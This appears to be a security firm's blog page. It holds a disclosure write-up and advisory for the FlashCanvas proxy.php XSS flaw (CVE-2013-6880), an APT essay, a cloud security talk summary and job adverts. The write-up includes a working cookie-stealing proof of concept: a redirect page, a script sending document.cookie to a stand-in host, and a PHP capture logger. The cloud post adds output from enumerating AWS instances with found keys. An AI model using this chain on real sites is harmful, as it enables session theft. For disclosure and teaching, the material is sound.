The Information Commissioner’s Office (ICO) has recently issued advice for companies with regards to BYOD (Bring Your Own Device). This guidance explores what you need to consider if permitting the use of personal devices to process personal data for which you are responsible. The ICO document can be found here:
Marc Wickenden recently discovered a security issue within FlashCanvas 1.5 that could lead to a number of issues, such as cross-site scripting. The issue has been assigned CVE number 2013-6880 and the vendor has now released a fix for the issue, which can be found here. In this blog post we take a closer look at the issue and the proof of concept that shows how this issue can be used to steal session tokens.
The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.
Within the proxy.php file the offending code is:
if (!preg_match('#/flash\d*canvas\.swf$#', $_SERVER['HTTP_REFERER'])) {
In order to exploit this issue the user needs to already be logged in to the target site and the attacker needs control of a website that can serve a page ending in /flashcanvas.swf
Our malicious /flashcanvas.swf makes a call to the vulnerable proxy.php on the remote site. An attacker entices a victim user to click on a malicious link. This makes a request, for example via a redirect, to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL and renders this in the context of the target site. Page rewrite, script execution, you name it, it becomes possible from this point.
We have generated a POC to prove this and can use the flaw to steal session cookies of a victim under the following scenario. In order to exploit this issue the attacker needs control of a website (lets call this delivery.com), that can serve a page ending in /flashcanvas.swf
We then use the following code to make a call to the vulnerable proxy.php on the remote site (lets call this target.com) and redirect the user to our evil site (evil.com). We used a completely separate host in order to ensure this was cross-domain.
On delivery.com we need the following:
-- flashcanvas.swf <!DOCTYPE html> <html> <head> <title>CVE 2013 6880 POC</title> <meta http-equiv="refresh" content="1;http://www.target.com/FlashCanvas/proxy.php?url=http://evil.com/xss.html"> </head> <body> <p>Redirecting...</p> </body> </html> -- On the evil.com site our script looks like this:
<script>location.href = 'http://delivery.com/capture.php?cookie='+document.cookie;</script>
The capture.php file on delivery.com is used to record and print out the information sent to the page. It is also included in the access logs of course. For completeness the capture.php is:
<?php
$date = date("dmY");
$timestamp = date("D M j G:i:s T Y");
$collectionfile = "/tmp/collection.$date";
$fh = fopen($collectionfile, "a");
$ip = $_SERVER['REMOTE_ADDR'];
fwrite($fh, "== $timestamp / $ip ==\n");
?>
<html>
<body>
<?php
if (isset($_GET)) {
fwrite($fh, "== GET ==\n");
foreach ($_GET as $k => $v) {
$arr = explode(";", $v);
foreach ($arr as $vv) {
$vals = explode("=", $vv);
print "<p>$vals[0]: $vals[1]</p>";
}
fwrite($fh, "$k:$v\n");
}
}
if (isset($_POST)) {
fwrite($fh, "== POST ==\n");
foreach ($_POST as $k => $v) {
fwrite($fh, "$k:$v\n");
print "$k: $v\n";
}
}
fclose($fh); ?> </body> </html>
In summary, an attacker entices a victim user to click on the malicious link (http://delivery.com/flashcanvas.swf). This makes a request, in our case we used a redirect to the vulnerable proxy.php at the target site with the Referer set to a passable value. The proxy.php fetches the requested target URL (http://evil.com/xss.html) and renders this in the context of the target.com site, including script execution and DOM functionality.
By default, under Apache the .swf extension will be served as Shockwave Flash. We require this to be served as a page, so this requires the following configuration changes on the evil.com webserver:
Comment out the following line on /etc/mime.types:
#application/x-shockwave-flash swf swfl In your apache configuration, change the following file /etc/apache2/mods-enabled/mime.conf and add:
AddType text/html .swf
Don’t forget to reload apache.
Title: FlashCanvas proxy.php XSS Vulnerability
Date published: 11 December 2013
Reference: CVE-2013-6880
Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it.
FlashCanvas.net <http://flashcanvas.net/>
FlashCanvas 1.5 and possibly older.
FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software maybe wider.
The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting. More technical detail can be found in the following blog post.
We would recommend updating to version 1.6
As part of our on-going development, 7 Elements is looking to take on another Junior Security Tester in the summer of 2014. Through our dedicated Graduate Junior Security Tester Training and Development Plan they will gain the skills and experience necessary to become an independent, effective and highly skilled manual security tester. More information on this vacancy can be found on our careers page.
Title: FlashCanvas proxy.php XSS Vulnerability
Date published: November 2013
Ref: CVE-2013-6880
Script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it
FlashCanvas.net <http://flashcanvas.net/>
FlashCanvas 1.5 and possibly older.
FlashCanvas is also used in other software frameworks such as WebShims, therefore the affected software maybe wider.
The issue exists because the proxy.php script does not adequately verify the Referer header before requesting (via curl) the remote URL specified in the ‘url’ GET parameter and rendering it. This leads to some interesting possibilities, the one proved being cross-site scripting.
For a proof of concept and further discussion, please see our blog on this issue.
e-Placement Scotland are working with us to help find a Security Testing Scheduler.
Security Testing Scheduler:
The role will be based from 7 Elements’ office.
The placement will be for 6 months, starting in January 2014.
Salary £15,000 per annum pro rata.
Apply online here
We are looking for a Senior Security Tester to join the team. We pride ourselves on our expertise in technical information assurance, as such the candidate must have a high level of technical ability and share our passion for information security.
If this sounds like you then visit our careers page to find out more.
Given that media coverage keeps going in terms of discussing ‘Advanced Persistent Threat’ and the need to keep a balanced view, I thought that I would revisit this topic. We first blogged and presented on this issue back in 2011 and those discussion points appear to still be valid now.
To be fair, I still have a love – hate relationship with the term Advanced Persistent Threat (APT). It is used to describe state sponsored espionage, which i know exists and can be a significant threat to specific entities such as government departments and defence contractors. I’m also aware of APT style attacks on corporate organisations. However, the term can be banded around and badly applied to security ‘hacks’ as well as being seen as a ‘China’ only issue. This is especially true when dealing with the media and specific security vendors. This is the side of APT that I hate.
APT is used to describe a variety of attacks but has its origins in what would be categorised as state sponsored cyber espionage. This traditional cyber espionage was concentrated on government agencies and supporting defence contractors. This has been extended to encompass a wider focus, resulting in what is known today as APT.
The objective of APT can be seen as;
APT stands for Advanced Persistent Threat. So what do these terms really mean? A number of definitions exist, but from my perspective I see APT as:
Advanced – This relates to the ability of the attacker. It doesn’t however mean that they will only use custom created code to launch what is known as ‘zero day’ attacks on a network. It is important to understand that they will use the path of least resistance when looking to compromise a network. If this can be done through trivially guessable passwords then this is the method they will use, but they have the capability to research and develop new attack code if required.
Persistent – This is a key differentiator with other threat actors. The aim of those conducting APT is to gain access to information. The information that is targeted is of greatest value when gathered in volume. APT attacks therefore seek to maintain access to the network for as long as is required to achieve this. Smash and grab attacks, such as those that target credit card information fall within a different class of threat actor, and should not be confused with APT. However, APT style attacks could be completed in such a fashion if they are able to meet their objectives with one short attack.
Threat – The use of the term threat within the context of APT relates to the fact that this is a targeted attack, which is directed to achieve a defined purpose and has both the intent and capability to gain access to the desired information.
For me there is a degree of cross-over between cybercrime and APT. Highly capable threat actors within both areas are highly organised, well-motivated and funded. This makes both these actors a real threat. The key difference between an attack being classified as APT or cybercrime is the intention or driver of the behind attack. At a high-level, cybercrime has a focus on making money by stealing data to commit fraud, APT is looking to gain a commercial advantage through the information that they gain access to.
APT has become over hyped and this has been used to sell products and services based on the APT threat. As an example, major security vendors now sell anti-APT services and products, with strap lines such as:
“Do You Know if Your Network Has Been Breached by Botnets, Advanced Malware or Persistent Threats?”
“threats such as the Advanced Persistent Threat (APT). These are one of the most dangerous types of threats”
“Introduces New Security Solutions to Counter Advanced Persistent Threats”
“Enterprise Computer Protection from Advanced Malware Threats/APT”
“New Security Solutions to Counter Advanced Persistent Threats”
Tom Reilly (CEO of ArcSight.Symantec) explained that revenue for the second quarter is expected to be in the range of $55 million to $57 million (that is 21%-25% growth over the same quarter last year). This is based partly on “growing cybercriminal activity and heightened awareness of the Advanced Persistent Threat”. So as you can see, APT is big business.
Even the media carry provocative statements around this topic that help fuel the hype:
“The APT attackers, however, employ undetectable zero-day exploits and social engineering techniques against company employees to breach networks.”
All of this feeds on the fear, uncertainty and doubt that exists around the term APT and implies the big bad guys are going to get you, regardless of who you are! Media focus is clearly on China and how they are behind all APT attacks. However this paints a very narrow picture of the reality and is predicated by the belief that all APT is state sponsored and worse, that China are the only players. By focusing on just one potential avenue, we may fail to address this issue.
In reality the threat is wider than that posed by ‘China’, in fact evidence leaked as part of the WikiLeaks stories showed that the US believed that “French espionage is so widespread that the damages [it causes] the German economy are larger as a whole than those caused by China or Russia.” (http://www.ibtimes.com/articles/97534/20110104/france-wikileaks-spying-germany.htm)
If we look more closely at APT, we can see that it falls into two categories. Firstly with its roots firmly as a method of cyber-espionage, it was focused on gaining government information and this would clearly be an activity undertaken by nation states. Secondly as a style of attack that is broadly aligned to gaining access to intellectual property (IP) and commercially sensitive data. This second category indicates that APT style attacks may not just be the preserve of state sponsored entities.
The aim of targeting commercial IP is to gain access to knowledge that can provide a competitive edge, such as blue prints, merger information and strategy documents. This type of information would give competitors an advantage over their rivals and this is the real driving force behind the wider use of attacks classed as APT. These motivating factors could be attributed to individual organisations as well as governments pursuing economic growth. This also extends the threat surface to include those you partner or share information with.
If we listen to the hype then we are all at risk, even the mighty Google and the IMF have fallen foul of APT! Then again we are not all in the same market as Google (with all its sensitive customer data) or the IMF. So the first question to ask yourself is; do you hold information that someone is willing to spend time and effort in trying to obtain? If the answer is no, then you can sleep soundly in bed at night. Well, from an APT perspective at least. If your own data or that of a client that you hold has value then you will need to consider the threat posed by APT.
I believe that we are at the most risk when we are looking in the wrong direction. Before we became aware of APT, organisations assessed that commercial data that had no value from a cybercrime or fraud perspective wouldn’t be a target in a hack. As a result, breaches went unnoticed. However, this continues to be the case. Why therefore do the attacks go unnoticed, how do they breach the network in the first place? In my opinion a lot of this is down to the wrong focus within the organisation and in what they are trying to protect (if anything!).
What do I mean by this? Well, within the UK we have a number of regulatory drivers that help organisations focus their priorities. The Information Commissioner and Data Protection requirements keep an organisation focused on protecting personal sensitive data. Financial regulation and PCI-DSS keep others focused on protecting financial data, however there is no requirement other than an individual organisations risk appetite in terms of protecting intellectual property. This is exactly what those conducting APT are targeting. They are going for something you didn’t think to protect. You made a risk based decision to focus on regulatory drivers, they made the decision to target your corporate network and steal as much data as they could and then see what was useful.
So what is the solution? How do we defend against APT? In reality, in the same way you defend against other cyber threats, through a resilient approach to information security. This will depend on how a business approaches risk management, the level of assurance required and based on organisation’s risk appetite.
Any approach taken should be driven by a clear business need and understanding of the risk environment and the organisation’s risk management structure. The business needs to be aware of the threat environment that they are in and be able to make informed decisions, and not just be blinkered into making regulatory based decisions only.
We also need to accept that we are not able to achieve 100% security, especially through appliance based solutions or by just doing penetration testing or by being regulatory compliant. Instead we should approach this problem from the point of view of business resiliency, which captures the ability for an organisation to be robust to attack and to be able to detect / react / recover from an incident. Therefore as an organisation you will need to take steps to look for evidence of compromise and act accordingly if it is found.
We are looking for a Security Testing Project Manager to join the team.
The role of the Security Testing Project Manager will be to work within 7 Elements’ busy technical team to manage the delivery of security testing whilst ensuring 7 Elements’ high standards of customer service are met. The main focus of the role is to ensure the smooth and effective delivery of security tests through technical project management. This role is key to the effective functioning of the overall test team. The project manager will be responsible for ensuring process is followed and that standards are met. This will require effective communication with clients and the testing team.
This role is ideal for an individual with a solid technical understanding of information technology and associated terminology and a basic understanding of information security looking for their first role within the information security industry. The role will allow an individual to gain an understanding of the broad spectrum of security testing in a business environment and the challenges this brings. As a customer facing role it will also enable the individual to gain that vital experience of working with businesses and understanding their requirements.
For further information visit our careers page.
On the 24th September I had the opportunity to talk at the Cloud Security Alliance Symposium, a free event in support of the Cloud Security Alliance EMEA Congress 2013 hosted in Edinburgh on Cloud Security. My talk focused on real life examples of cloud security issues and internal research that we at 7 Elements had been working on. Our earlier paper on cloud security issues can be found here. This blog post covers some of the themes discussed during my talk.
What is the Cloud? Well, in short, it is a great marketing gimmick. There is no one such individual thing as the ‘Cloud’. The Cloud is a term used to describe multiple service offerings such as Software as a Service (SaaS), Platform as a Service (PaaS) as well as Infrastructure as a Service (IaaS). All of this is characterised by the use of on-demand provision, rapid ability to scale and are based on payment solely for the amount of resource required at any given point.
What are the key risks presented by using the Cloud? For me, the key risks and some of the issues that an organisation should explore when looking at the Cloud break down as follows:
Legal Jurisdiction
As an organisation you should be aware of how legal requirements to disclose data may be affected by the geography of where the data is stored. If you are based in the UK and use a US based Cloud provider, consider the impact on your organisation if the US courts enforce disclosure of your sensitive data. Where the Cloud is used to store or process sensitive personal data, there may be an impact on your compliance with the required regulation (Data Protection Act,) which you will need to fully understand and mitigate.
Geographical Location
Different geographical locations mean different legal jurisdictions, which will have an impact on your legal and regulatory requirements within each of those regions. This may restrict the type of data that can be stored or processed or limit how the data in question can be transferred between locations. The ability to encrypt data will also be impacted within certain locations due to export restrictions.
Access to Data
Many Cloud services are based on the use of shared services or multi-tenancy solutions. The benefit to the end user is reduced costs, but this can also lead to security concerns. The data may be at risk of attack from another user of the same Cloud service due to the architecture in use. Consideration should be given to how the Cloud provider has limited the possibility of data compromise.
Data Destruction
With the Cloud, you can grow and shrink your resource requirement. When the data on disks is no longer needed then it will need to be destroyed. You will need to gain assurance that this has been destroyed in compliance with your organisation’s standards, that the next user of that environment will not accidentally gain access to your data, and that you have met any regulatory requirements.
Data Availability
The Cloud sells itself as always being there. The data is ‘in the Cloud’, so you will always have access to it. However, the Cloud brings its own impact in relation to your organisational business continuity plans and disaster recovery approach. Consideration should be given to scenarios where the Cloud provider fails, or your ability to connect to the Internet fails. This may render the data unavailable.
Economic Denial of Service
What controls do you have in place to protect against unauthorised provisioning of cloud instances? Based upon a simple example of an attacker gaining access to an organisations provisioning capability (a real life example of gaining access is included later in the blog), we have estimated that an attacker could cause an individual organisation £14,000 of costs in a single day. More on this will follow in a separate blog on Economic Denial of Service.
The talk then moved on to real life examples of cloud based security issues.
Geographical Location
The first focused on the geographical location for data. Did you know that internally created or ‘private’ cloud installations can be configured to automatically connect to the public cloud if capacity is reached?
The following example shows a private cloud, configured to do just this:
Server instantiated on Eucalyptus.
Number of instances running: 1
===============================================
=================================================================
Auto-scaling successful
instantiated eb server: instanceID i-35AE00C1
Number of servers: 2
=================================================================
=================================================================
Cloud bursting successful
Instantiated web server on EC2: instanceID i-32CB323A
Number of servers: 3
=================================================================
=================================================================
The issue here is that data is now outside of the organisation’s boundary and is stored on Amazon EC2. Given this scenario, there would be no prior warning and no assessment of the data that is now in the public cloud. This could lead to potential information disclosure or breach data handling requirements.
Access to Data
We then looked at the issue of who has access to your data. A recent article outlined how Dropbox were accessing uploaded word documents. The researcher discovered his documents were being opened by Dropbox-owned Amazon EC2 instances automatically 10 minutes after they had been uploaded, although other file types were not being accessed. The following screenshot shows the EC2 IP addresses accessing the documents:
More on this issue can be found in our previous blog post here.
At the end of the talk, I then provided a live demo of how easy it was to identify valid Amazon EC2 and S3 access and secret key values and use these to enumerate running cloud instances.
$ ruby enumerate.rb
Enumerating AWS account AKWWR5MSIHCI7FH3HIAA
EC2 Instances
——————————————————————————-
[*] i-828b26e4 / running / 54.224.143.100
S3 Buckets
——————————————————————————-
oa-site-backups
– /home/data/_backups/20130902.database.sql.tgz
– /home/data/_backups/20130901.database.sql.tgz
An individual who has access to these credentials could choose to start new cloud instances (potentially leading to an economic denial of service), stop current services leading to a more common denial of service or more importantly, access the data currently stored within that instance. This issue will be covered in more detail in our next Cloud Security blog.
As we have seen in many ways, the Cloud is no different to the wider challenges of managing an organisation’s data securely. However, with these unique opportunities, unique risks will also arise. As such, we need to understand those risks and assess the data that we wish to put into the Cloud and understand how important that data is in terms of confidentiality, availability and integrity to the business.